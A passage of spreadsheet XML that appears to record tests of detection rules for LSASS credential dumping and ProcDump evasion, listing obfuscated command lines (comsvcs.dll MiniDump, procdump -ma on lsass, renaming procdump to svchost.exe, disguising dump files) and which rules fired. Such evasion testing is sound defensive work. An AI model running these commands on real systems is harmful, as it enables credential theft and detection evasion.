        </is>
      </c>
      <c r="F223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H223" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I223" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998); Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J223" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K223" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1" s="42">
      <c r="A224" s="43" t="n"/>
      <c r="B224" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_lsass_dmp_cli_keywords</t>
        </is>
      </c>
      <c r="C224" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine</t>
        </is>
      </c>
      <c r="D224" s="44" t="inlineStr">
        <is>
          <t>ffa6861c-4461-4f59-8a41-578c39f3f23e</t>
        </is>
      </c>
      <c r="E224" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump 652 C:\temp\out.tmp full</t>
        </is>
      </c>
      <c r="F224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H224" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I224" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Comsvcs.DLL (646ea171-dded-4578-8a4d-65e9822892e3); Process Memory Dump Via Comsvcs.DLL (646ea171-dded-4578-8a4d-65e9822892e3); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J224" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K224" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1" s="42">
      <c r="A225" s="43" t="n"/>
      <c r="B225" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C225" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D225" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E225" s="44" t="inlineStr">
        <is>
          <t>robocopy C:\Sysinternals C:\temp procdump.exe</t>
        </is>
      </c>
      <c r="F225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I225" s="44" t="n"/>
      <c r="J225" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K225" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1" s="42">
      <c r="A226" s="43" t="n"/>
      <c r="B226" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C226" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D226" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E226" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ren procdump.exe pd.exe</t>
        </is>
      </c>
      <c r="F226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I226" s="44" t="n"/>
      <c r="J226" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K226" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1" s="42">
      <c r="A227" s="43" t="n"/>
      <c r="B227" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C227" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D227" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E227" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G227" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H227" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I227" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J227" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K227" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1" s="42">
      <c r="A228" s="43" t="n"/>
      <c r="B228" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C228" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D228" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E228" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G228" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H228" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I228" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J228" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K228" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1" s="42">
      <c r="A229" s="43" t="n"/>
      <c r="B229" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C229" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D229" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E229" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I229" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J229" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K229" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1" s="42">
      <c r="A230" s="43" t="n"/>
      <c r="B230" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C230" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D230" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E230" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G230" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H230" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I230" s="4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230" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K230" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="43" t="n"/>
      <c r="B231" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C231" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D231" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E231" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="44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231" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K231" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="43" t="n"/>
      <c r="B232" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C232" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D232" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E232" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I232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232" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K232" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="43" t="n"/>
      <c r="B233" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C233" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D233" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E233" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I233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233" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K233" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="43" t="n"/>
      <c r="B234" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C234" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D234" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E234" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I234" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J234" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K234" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="43" t="n"/>
      <c r="B235" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C235" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D235" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E235" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H235" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J235" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K235" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="43" t="n"/>
      <c r="B236" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C236" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D236" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E236" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H236" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J236" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K236" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="43" t="n"/>
      <c r="B237" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C237" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D237" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E237" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H237" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I237" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J237" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K237" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="43" t="n"/>
      <c r="B238" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C238" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D238" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E238" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H238" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I238" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J238" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K238" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="43" t="n"/>
      <c r="B239" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C239" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D239" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E239" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I239" s="43" t="n"/>
      <c r="J239" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K239" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="43" t="n"/>
      <c r="B240" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C240" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D240" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E240" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I240" s="44" t="n"/>
      <c r="J240" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K240" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="43" t="n"/>
      <c r="B241" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C241" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D241" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E241" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I241" s="44" t="n"/>
      <c r="J241" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K241" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="43" t="n"/>
      <c r="B242" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C242" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D242" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E242" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I242" s="43" t="n"/>
      <c r="J242" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K242" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="43" t="n"/>
      <c r="B243" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C243" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D243" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E243" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I243" s="44" t="n"/>
      <c r="J243" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K243" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="43" t="n"/>
      <c r="B244" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C244" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D244" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E244" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H244" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I244" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J244" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K244" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="43" t="n"/>
      <c r="B245" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C245" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D245" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E245" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I245" s="44" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J245" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K245" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="43" t="n"/>
      <c r="B246" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C246" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D246" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E246" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I246" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J246" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K246" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="43" t="n"/>
      <c r="B247" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C247" s="44" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D247" s="44" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E247" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H247" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I247" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J247" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K247" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="43" t="n"/>
      <c r="B248" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C248" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D248" s="43" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E248" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H248" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I248" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J248" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K248" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="44" t="n"/>
      <c r="B249" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C249" s="44" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D249" s="44" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E249" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F249" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J249" s="44" t="n">
        <v>0</v>
      </c>
